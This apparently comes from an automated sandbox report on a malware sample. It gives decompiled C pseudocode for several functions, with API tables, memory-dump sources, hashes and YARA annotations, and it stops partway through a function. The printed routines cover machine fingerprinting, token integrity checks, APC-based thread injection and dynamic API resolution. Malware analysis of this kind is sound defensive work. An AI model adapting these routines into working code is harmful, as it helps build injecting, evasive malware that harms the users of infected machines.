				void* _t19;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L00A62160();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0xa641c4;
				_push(_t15 + 0xa6505e);
				_push(_t15 + 0xa65054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L00A6215A();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t19 = CreateFileMappingW(0xffffffff, 0xa641c8, 4, 0, _t18,  &_v60); // executed
				_t34 = _t19;
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}














                                                                                                                                                                                                                                0x00a61210
                                                                                                                                                                                                                                0x00a61219
                                                                                                                                                                                                                                0x00a6121d
                                                                                                                                                                                                                                0x00a61223
                                                                                                                                                                                                                                0x00a61228
                                                                                                                                                                                                                                0x00a6122d
                                                                                                                                                                                                                                0x00a61230
                                                                                                                                                                                                                                0x00a61233
                                                                                                                                                                                                                                0x00a61238
                                                                                                                                                                                                                                0x00a61239
                                                                                                                                                                                                                                0x00a6123c
                                                                                                                                                                                                                                0x00a61247
                                                                                                                                                                                                                                0x00a6124e
                                                                                                                                                                                                                                0x00a61252
                                                                                                                                                                                                                                0x00a61254
                                                                                                                                                                                                                                0x00a61255
                                                                                                                                                                                                                                0x00a61258
                                                                                                                                                                                                                                0x00a6125d
                                                                                                                                                                                                                                0x00a61267
                                                                                                                                                                                                                                0x00a61269
                                                                                                                                                                                                                                0x00a61269
                                                                                                                                                                                                                                0x00a6127d
                                                                                                                                                                                                                                0x00a61283
                                                                                                                                                                                                                                0x00a61287
                                                                                                                                                                                                                                0x00a612d7
                                                                                                                                                                                                                                0x00a61289
                                                                                                                                                                                                                                0x00a61292
                                                                                                                                                                                                                                0x00a612a8
                                                                                                                                                                                                                                0x00a612b0
                                                                                                                                                                                                                                0x00a612c2
                                                                                                                                                                                                                                0x00a612c6
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a612b2
                                                                                                                                                                                                                                0x00a612b5
                                                                                                                                                                                                                                0x00a612ba
                                                                                                                                                                                                                                0x00a612bc
                                                                                                                                                                                                                                0x00a612bc
                                                                                                                                                                                                                                0x00a6129d
                                                                                                                                                                                                                                0x00a6129f
                                                                                                                                                                                                                                0x00a612c8
                                                                                                                                                                                                                                0x00a612c9
                                                                                                                                                                                                                                0x00a612c9
                                                                                                                                                                                                                                0x00a61292
                                                                                                                                                                                                                                0x00a612df

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,00A610DD,0000000A,?,?), ref: 00A6121D
                                                                                                                                                                                                                                • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 00A61233
                                                                                                                                                                                                                                • _snwprintf.NTDLL ref: 00A61258
                                                                                                                                                                                                                                • CreateFileMappingW.KERNELBASE(000000FF,00A641C8,00000004,00000000,?,?), ref: 00A6127D
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00A610DD,0000000A,?), ref: 00A61294
                                                                                                                                                                                                                                • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 00A612A8
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00A610DD,0000000A,?), ref: 00A612C0
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00A610DD,0000000A), ref: 00A612C9
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00A610DD,0000000A,?), ref: 00A612D1
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.879916049.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.879953190.0000000000A65000.00000040.00000010.sdmp Download File
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                                                                                                                                                                                                • String ID: @Mxt MxtTxt
                                                                                                                                                                                                                                • API String ID: 1724014008-1084903527
                                                                                                                                                                                                                                • Opcode ID: b67768f2784ab679300b9bc682dc60dc773125a73d3d5b700a0161079bfd811f
                                                                                                                                                                                                                                • Instruction ID: fb2d3ca41b9889a11dd006553324bac63735576d07232c965d54c28672b30366
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b67768f2784ab679300b9bc682dc60dc773125a73d3d5b700a0161079bfd811f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 45219DB2A00108BFDB10EFB4CC94EEE7BB8EB58350F194535F606E7190D67099468B60
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A91DF5, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 72filetimeCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 74%
                                                                                                                                                                                                                                			E00A91DF5(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L00A9AEBA();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0xa9d2e0; // 0x453a5a8
				_t5 = _t13 + 0xa9e876; // 0x4fd8e1e
				_t6 = _t13 + 0xa9e59c; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L00A9ABDA();
				_t17 = CreateFileMappingW(0xffffffff, 0xa9d2e4, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}













                                                                                                                                                                                                                                0x00a91df5
                                                                                                                                                                                                                                0x00a91dfd
                                                                                                                                                                                                                                0x00a91e01
                                                                                                                                                                                                                                0x00a91e07
                                                                                                                                                                                                                                0x00a91e0c
                                                                                                                                                                                                                                0x00a91e11
                                                                                                                                                                                                                                0x00a91e14
                                                                                                                                                                                                                                0x00a91e17
                                                                                                                                                                                                                                0x00a91e1c
                                                                                                                                                                                                                                0x00a91e1d
                                                                                                                                                                                                                                0x00a91e20
                                                                                                                                                                                                                                0x00a91e25
                                                                                                                                                                                                                                0x00a91e2c
                                                                                                                                                                                                                                0x00a91e36
                                                                                                                                                                                                                                0x00a91e38
                                                                                                                                                                                                                                0x00a91e39
                                                                                                                                                                                                                                0x00a91e3c
                                                                                                                                                                                                                                0x00a91e58
                                                                                                                                                                                                                                0x00a91e5e
                                                                                                                                                                                                                                0x00a91e62
                                                                                                                                                                                                                                0x00a91eb0
                                                                                                                                                                                                                                0x00a91e64
                                                                                                                                                                                                                                0x00a91e71
                                                                                                                                                                                                                                0x00a91e81
                                                                                                                                                                                                                                0x00a91e89
                                                                                                                                                                                                                                0x00a91e9b
                                                                                                                                                                                                                                0x00a91e9f
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a91e8b
                                                                                                                                                                                                                                0x00a91e8e
                                                                                                                                                                                                                                0x00a91e93
                                                                                                                                                                                                                                0x00a91e95
                                                                                                                                                                                                                                0x00a91e95
                                                                                                                                                                                                                                0x00a91e73
                                                                                                                                                                                                                                0x00a91e75
                                                                                                                                                                                                                                0x00a91ea1
                                                                                                                                                                                                                                0x00a91ea2
                                                                                                                                                                                                                                0x00a91ea2
                                                                                                                                                                                                                                0x00a91e71
                                                                                                                                                                                                                                0x00a91eb7

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,00A95790,?,?,4D283A53,?,?), ref: 00A91E01
                                                                                                                                                                                                                                • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 00A91E17
                                                                                                                                                                                                                                • _snwprintf.NTDLL ref: 00A91E3C
                                                                                                                                                                                                                                • CreateFileMappingW.KERNELBASE(000000FF,00A9D2E4,00000004,00000000,00001000,?), ref: 00A91E58
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00A95790,?,?,4D283A53), ref: 00A91E6A
                                                                                                                                                                                                                                • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 00A91E81
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00A95790,?,?), ref: 00A91EA2
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00A95790,?,?,4D283A53), ref: 00A91EAA
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                                                                                                                                                                                                • String ID: @MxtNxt
                                                                                                                                                                                                                                • API String ID: 1814172918-1701360479
                                                                                                                                                                                                                                • Opcode ID: 3a7adf8fbde7bcb20469b6727302bfba22fdd028e7576b66af21a63404d5a657
                                                                                                                                                                                                                                • Instruction ID: feae8621fdc51cca5dbc0158c192c3563ed27b793ef86c3177f57b51e78c3164
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3a7adf8fbde7bcb20469b6727302bfba22fdd028e7576b66af21a63404d5a657
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3D21D272B40205FBDB11DBA4DC45FAE37F9AF84710F204122FA05E7190DA7099068B60
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A99DE1, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 103memoryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 96%
                                                                                                                                                                                                                                			E00A99DE1(char __eax, void* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				void* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0xa9d2a8; // 0xd448b889
					_v12 = _t59;
				}
				_t64 = _t69;
				E00A94E13( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0xa9d2dc ^ 0x46d76429;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0xa9d270, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t64 = _t62;
								 *_t69 =  *_t69 ^ E00A9680B(_v8 + _v8, _t64);
							}
							HeapFree( *0xa9d270, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0xa9d270, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t64 = _t68;
							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E00A9680B(_v8 + _v8, _t64);
						}
						HeapFree( *0xa9d270, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *((intOrPtr*)(_t67 + 8)) = 0;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
				return _t39;
			}



















                                                                                                                                                                                                                                0x00a99de1
                                                                                                                                                                                                                                0x00a99de9
                                                                                                                                                                                                                                0x00a99ded
                                                                                                                                                                                                                                0x00a99df0
                                                                                                                                                                                                                                0x00a99df5
                                                                                                                                                                                                                                0x00a99df7
                                                                                                                                                                                                                                0x00a99dfc
                                                                                                                                                                                                                                0x00a99dfc
                                                                                                                                                                                                                                0x00a99e02
                                                                                                                                                                                                                                0x00a99e04
                                                                                                                                                                                                                                0x00a99e11
                                                                                                                                                                                                                                0x00a99e72
                                                                                                                                                                                                                                0x00a99e13
                                                                                                                                                                                                                                0x00a99e18
                                                                                                                                                                                                                                0x00a99e1e
                                                                                                                                                                                                                                0x00a99e23
                                                                                                                                                                                                                                0x00a99e31
                                                                                                                                                                                                                                0x00a99e35
                                                                                                                                                                                                                                0x00a99e44
                                                                                                                                                                                                                                0x00a99e4b
                                                                                                                                                                                                                                0x00a99e52
                                                                                                                                                                                                                                0x00a99e52
                                                                                                                                                                                                                                0x00a99e5d
                                                                                                                                                                                                                                0x00a99e5d
                                                                                                                                                                                                                                0x00a99e35
                                                                                                                                                                                                                                0x00a99e23
                                                                                                                                                                                                                                0x00a99e74
                                                                                                                                                                                                                                0x00a99e7a
                                                                                                                                                                                                                                0x00a99e84
                                                                                                                                                                                                                                0x00a99e86
                                                                                                                                                                                                                                0x00a99e8b
                                                                                                                                                                                                                                0x00a99e9a
                                                                                                                                                                                                                                0x00a99e9e
                                                                                                                                                                                                                                0x00a99ea9
                                                                                                                                                                                                                                0x00a99eb0
                                                                                                                                                                                                                                0x00a99eb7
                                                                                                                                                                                                                                0x00a99eb7
                                                                                                                                                                                                                                0x00a99ec3
                                                                                                                                                                                                                                0x00a99ec3
                                                                                                                                                                                                                                0x00a99e9e
                                                                                                                                                                                                                                0x00a99ece
                                                                                                                                                                                                                                0x00a99ed0
                                                                                                                                                                                                                                0x00a99ed3
                                                                                                                                                                                                                                0x00a99ed5
                                                                                                                                                                                                                                0x00a99ed8
                                                                                                                                                                                                                                0x00a99edb
                                                                                                                                                                                                                                0x00a99ee5
                                                                                                                                                                                                                                0x00a99ee9
                                                                                                                                                                                                                                0x00a99eed

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetUserNameW.ADVAPI32(00000000,?), ref: 00A99E18
                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 00A99E2F
                                                                                                                                                                                                                                • GetUserNameW.ADVAPI32(00000000,?), ref: 00A99E3C
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,00A9587F), ref: 00A99E5D
                                                                                                                                                                                                                                • GetComputerNameW.KERNEL32(00000000,00000000), ref: 00A99E84
                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00A99E98
                                                                                                                                                                                                                                • GetComputerNameW.KERNEL32(00000000,00000000), ref: 00A99EA5
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,00A9587F), ref: 00A99EC3
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: HeapName$AllocateComputerFreeUser
                                                                                                                                                                                                                                • String ID: Uxt
                                                                                                                                                                                                                                • API String ID: 3239747167-1536154274
                                                                                                                                                                                                                                • Opcode ID: 979486572fe78d0f23a065ca4cdb92179ca3c2b64ef2c3314fb0250a9c24dbd1
                                                                                                                                                                                                                                • Instruction ID: f756a8f96d9e24147243b2e14c8e6784d4057828bc0aab08c2e64a79648b9286
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 979486572fe78d0f23a065ca4cdb92179ca3c2b64ef2c3314fb0250a9c24dbd1
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E131B5B1B00209EFDB10DFA9DD81AAEB7F9EB48310F11446AE505D3220EB30EE469B51
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A61000, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 32threadinjectionCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E00A61000(long _a4, DWORD* _a12) {
				_Unknown_base(*)()* _v0;
				void* _t4;
				long _t6;
				long _t11;
				void* _t13;

				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0xa641c0, 0, _a12); // executed
				_t13 = _t4;
				if(_t13 != 0) {
					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
					if(_t6 == 0) {
						_t11 = GetLastError();
						TerminateThread(_t13, _t11);
						CloseHandle(_t13);
						_t13 = 0;
						SetLastError(_t11);
					}
				}
				return _t13;
			}








                                                                                                                                                                                                                                0x00a61017
                                                                                                                                                                                                                                0x00a6101d
                                                                                                                                                                                                                                0x00a61021
                                                                                                                                                                                                                                0x00a6102c
                                                                                                                                                                                                                                0x00a61034
                                                                                                                                                                                                                                0x00a6103d
                                                                                                                                                                                                                                0x00a61041
                                                                                                                                                                                                                                0x00a61048
                                                                                                                                                                                                                                0x00a6104f
                                                                                                                                                                                                                                0x00a61051
                                                                                                                                                                                                                                0x00a61057
                                                                                                                                                                                                                                0x00a61034
                                                                                                                                                                                                                                0x00a6105b

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CreateThread.KERNEL32 ref: 00A61017
                                                                                                                                                                                                                                • QueueUserAPC.KERNEL32(?,00000000,?), ref: 00A6102C
                                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000), ref: 00A61037
                                                                                                                                                                                                                                • TerminateThread.KERNEL32(00000000,00000000), ref: 00A61041
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00A61048
                                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 00A61051
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.879916049.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.879953190.0000000000A65000.00000040.00000010.sdmp Download File
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
                                                                                                                                                                                                                                • String ID: @Mxt MxtTxt
                                                                                                                                                                                                                                • API String ID: 3832013932-1084903527
                                                                                                                                                                                                                                • Opcode ID: 3508558dc8a1efc315014345f44063a74777dd55e35eef4b59970adb0854f870
                                                                                                                                                                                                                                • Instruction ID: 2026f9fbc0fbcf23d50a736f384ba3da691300979b55b3a6aa388dba705e3461
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3508558dc8a1efc315014345f44063a74777dd55e35eef4b59970adb0854f870
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2BF08233205660BBDB229BE0AC0CF6BBF78FB08752F060504F70590060C7A18A4F9BA1
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A959B4, Relevance: 10.6, APIs: 7, Instructions: 75COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E00A959B4(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0xa9d294 > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E00A95157(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E00A953BB(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}









                                                                                                                                                                                                                                0x00a959c1
                                                                                                                                                                                                                                0x00a959c8
                                                                                                                                                                                                                                0x00a959cf
                                                                                                                                                                                                                                0x00a959e3
                                                                                                                                                                                                                                0x00a959ee
                                                                                                                                                                                                                                0x00a95a06
                                                                                                                                                                                                                                0x00a95a13
                                                                                                                                                                                                                                0x00a95a16
                                                                                                                                                                                                                                0x00a95a1b
                                                                                                                                                                                                                                0x00a95a26
                                                                                                                                                                                                                                0x00a95a2a
                                                                                                                                                                                                                                0x00a95a39
                                                                                                                                                                                                                                0x00a95a3d
                                                                                                                                                                                                                                0x00a95a59
                                                                                                                                                                                                                                0x00a95a59
                                                                                                                                                                                                                                0x00a95a5d
                                                                                                                                                                                                                                0x00a95a5d
                                                                                                                                                                                                                                0x00a95a62
                                                                                                                                                                                                                                0x00a95a66
                                                                                                                                                                                                                                0x00a95a6c
                                                                                                                                                                                                                                0x00a95a6d
                                                                                                                                                                                                                                0x00a95a74
                                                                                                                                                                                                                                0x00a95a7a

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 00A959E6
                                                                                                                                                                                                                                • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 00A95A06
                                                                                                                                                                                                                                • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 00A95A16
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00A95A66
                                                                                                                                                                                                                                  • Part of subcall function 00A95157: RtlAllocateHeap.NTDLL(00000000,00000000,00A91259), ref: 00A95163
                                                                                                                                                                                                                                • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 00A95A39
                                                                                                                                                                                                                                • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 00A95A41
                                                                                                                                                                                                                                • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 00A95A51
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1295030180-0
                                                                                                                                                                                                                                • Opcode ID: 0d3591ec6ef1d048fb382e90b4630968d2eb7d475fecfe49debcc4393548c319
                                                                                                                                                                                                                                • Instruction ID: b636fcceeaa96a4077f432f70ca1382723b63c91bce9ce0afb98c6bb68804939
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0d3591ec6ef1d048fb382e90b4630968d2eb7d475fecfe49debcc4393548c319
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5A211B75A00209BFEF01DFA4DD89DAEBBB9EF04344F100166E511A7161CB714A46DB50
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A61C61, Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E00A61C61(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t39;
				_Unknown_base(*)()* _t42;
				intOrPtr _t46;
				struct HINSTANCE__* _t50;
				intOrPtr _t56;

				_t56 = E00A62020(0x20);
				if(_t56 == 0) {
					_v8 = 8;
				} else {
					_t50 = GetModuleHandleA( *0xa641c4 + 0xa65014);
					_v8 = 0x7f;
					_t29 = GetProcAddress(_t50,  *0xa641c4 + 0xa65151);
					 *(_t56 + 0xc) = _t29;
					if(_t29 == 0) {
						L8:
						E00A61F0A(_t56);
					} else {
						_t33 = GetProcAddress(_t50,  *0xa641c4 + 0xa65161);
						 *(_t56 + 0x10) = _t33;
						if(_t33 == 0) {
							goto L8;
						} else {
							_t36 = GetProcAddress(_t50,  *0xa641c4 + 0xa65174);
							 *(_t56 + 0x14) = _t36;
							if(_t36 == 0) {
								goto L8;
							} else {
								_t39 = GetProcAddress(_t50,  *0xa641c4 + 0xa65189);
								 *(_t56 + 0x18) = _t39;
								if(_t39 == 0) {
									goto L8;
								} else {
									_t42 = GetProcAddress(_t50,  *0xa641c4 + 0xa6519f);
									 *(_t56 + 0x1c) = _t42;
									if(_t42 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t56 + 8)) = _a8;
										 *((intOrPtr*)(_t56 + 4)) = _a4;
										_t46 = E00A612E2(_t56, _a12); // executed
										_v8 = _t46;
										if(_t46 != 0) {
											goto L8;
										} else {
											 *_a16 = _t56;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}












                                                                                                                                                                                                                                0x00a61c6f
                                                                                                                                                                                                                                0x00a61c73
                                                                                                                                                                                                                                0x00a61d34
                                                                                                                                                                                                                                0x00a61c79
                                                                                                                                                                                                                                0x00a61c91
                                                                                                                                                                                                                                0x00a61ca0
                                                                                                                                                                                                                                0x00a61ca7
                                                                                                                                                                                                                                0x00a61ca9
                                                                                                                                                                                                                                0x00a61cae
                                                                                                                                                                                                                                0x00a61d2c
                                                                                                                                                                                                                                0x00a61d2d
                                                                                                                                                                                                                                0x00a61cb0
                                                                                                                                                                                                                                0x00a61cbd
                                                                                                                                                                                                                                0x00a61cbf
                                                                                                                                                                                                                                0x00a61cc4
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a61cc6
                                                                                                                                                                                                                                0x00a61cd3
                                                                                                                                                                                                                                0x00a61cd5
                                                                                                                                                                                                                                0x00a61cda
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a61cdc
                                                                                                                                                                                                                                0x00a61ce9
                                                                                                                                                                                                                                0x00a61ceb
                                                                                                                                                                                                                                0x00a61cf0
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a61cf2
                                                                                                                                                                                                                                0x00a61cff
                                                                                                                                                                                                                                0x00a61d01
                                                                                                                                                                                                                                0x00a61d06
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a61d08
                                                                                                                                                                                                                                0x00a61d0e
